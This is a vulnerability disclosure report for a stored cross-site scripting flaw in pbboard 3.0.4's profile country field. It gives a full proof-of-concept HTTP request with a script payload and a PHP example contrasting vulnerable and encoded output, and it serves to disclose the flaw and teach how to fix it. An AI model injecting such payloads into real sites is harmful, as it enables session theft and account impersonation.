Stored XSS in Edit user member profile in pbboard/pbboard-3.0.4
Reported on
Apr 4th 2023
Description
When a user updates their personal information, the country parameter accepts an XSS payload; the value is stored and the script executes later when the edited user's content is displayed.
Step 1. Update the user's personal information with the payload in the country field.
Proof of Concept
// PoC request:
// payload: "><script>alert(String.fromCharCode(88,83))</script>
POST /pbboard/index.php?page=usercp&control=1&info=1&start=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/pbboard/index.php?page=usercp&control=1&info=1&main=1
Cookie: eid=2; download_started=0; PHPSESSID=dngclv00c2khlomtdkccv6vfh2; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; PowerBB_lastvisit=1680611668; plupload_ui_view=thumbs
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
birth_date=14-4-2005&country=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%29%29%3C%2Fscript%3E&gender=m&website=&info=%5C%5C%5C%5C%5C%5C%5C%22%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29&away=0&away_msg=1&send=Save+settings
Step 2. Click on a post by the user whose profile was edited.
Step 3. The XSS alert is shown.
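The root cause behind the steps above is a profile field that is written into HTML without output encoding. The following is an added example, not pbboard's own code, showing that rendering pattern beside its hardened form; the array shape, function names and the allow-list regular expression are assumptions, and the sample value is the URL-decoded country parameter from the PoC request above.

```php
<?php
// Added example (not pbboard's code): how a stored profile field such as
// `country` becomes a stored XSS sink, and how to render it safely.
// Assumption: $profile is an associative array loaded from the database,
// where the value was saved exactly as submitted.

// Vulnerable pattern: the stored value is concatenated straight into an HTML
// attribute. A value beginning with "> closes the attribute and the tag, and
// whatever follows is parsed as markup, so a <script> element runs.
function renderCountryVulnerable(array $profile): string
{
    return '<input type="text" name="country" value="' . $profile['country'] . '">';
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES escapes both " and ', so the value can never terminate the
// attribute, and < and > become entities, so no element is created.
function renderCountryHardened(array $profile): string
{
    $country = htmlspecialchars($profile['country'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="country" value="' . $country . '">';
}

// Defence in depth at input time: accept only characters that can plausibly
// appear in a country name, so markup never reaches the database at all.
// (The allow-list and the 64-character limit are assumptions for this example.)
function isValidCountry(string $value): bool
{
    return (bool) preg_match('/^[\p{L}\p{M} .\'-]{1,64}$/u', $value);
}

// Constructed sample: the country value from the PoC request, URL-decoded.
$profile = ['country' => '"><script>alert(String.fromCharCode(88,83))</script>'];

echo renderCountryVulnerable($profile), PHP_EOL;
echo renderCountryHardened($profile), PHP_EOL;
var_dump(isValidCountry($profile['country']));
var_dump(isValidCountry('Viet Nam'));
```

Run under the PHP CLI, the first echo prints markup containing a live script element, while the second prints the same value with the quote and angle brackets turned into entities, so the browser shows the payload as text inside the input rather than executing it. The validator rejects the payload and accepts an ordinary country name; encoding at output remains the primary fix, since validation alone cannot cover every context the value is later rendered in.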
Impact
XSS can cause serious issues. Attackers often leverage XSS to steal session cookies and impersonate the user.
The bug was successfully fixed.
I checked that the XSS vulnerability in the profile has been fixed.